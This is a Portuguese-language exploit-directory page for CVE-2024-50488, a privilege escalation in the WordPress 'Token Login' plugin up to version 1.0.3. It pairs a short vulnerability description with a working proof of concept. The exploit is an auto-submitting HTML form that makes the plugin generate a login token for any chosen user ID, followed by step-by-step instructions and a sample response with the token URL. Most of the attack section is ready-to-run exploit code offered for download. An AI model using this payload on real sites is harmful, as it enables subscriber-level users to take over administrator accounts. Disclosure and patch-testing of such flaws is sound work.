Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-50488 — Token Login <= 1.0.3 - Autenticado (Subscriber+) Escalação de Privilégios | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-50488
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubrandomrobbiebf/cve-2024-50488

CVE-2024-50488

Token Login <= 1.0.3 - Autenticado (Subscriber+) Escalação de Privilégios

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-50488

Token Login <= 1.0.3 - Escalação de Privilégios Autenticada (Subscriber+)

Descrição:

O plugin Auto Login using a secure tokenized url. Role wise login restriction. para WordPress é vulnerável a escalação de privilégios via tomada de conta em todas as versões até, e incluindo, 1.0.3. Isso se deve ao fato de que o plugin não verifica adequadamente se um usuário tem permissão para gerar um token de login para outros usuários. Isso torna possível que atacantes autenticados, com acesso de nível de assinante ou superior, façam login como outros, incluindo administradores.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login

POC

Faça login e execute este envio HTML. Altere a URL para o site WordPress no qual você está logado. Altere o ID para o usuário para o qual deseja gerar o token. Copie a URL e você poderá fazer login como ele.

root@kitploit:~
<html>
  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tl&#95;admin&#95;ajax&#95;action" />
      <input type="hidden" name="method" value="regenerate&#95;token" />
      <input type="hidden" name="user&#95;id" value="7" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Resposta

root@kitploit:~
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}
Baixar ferramenta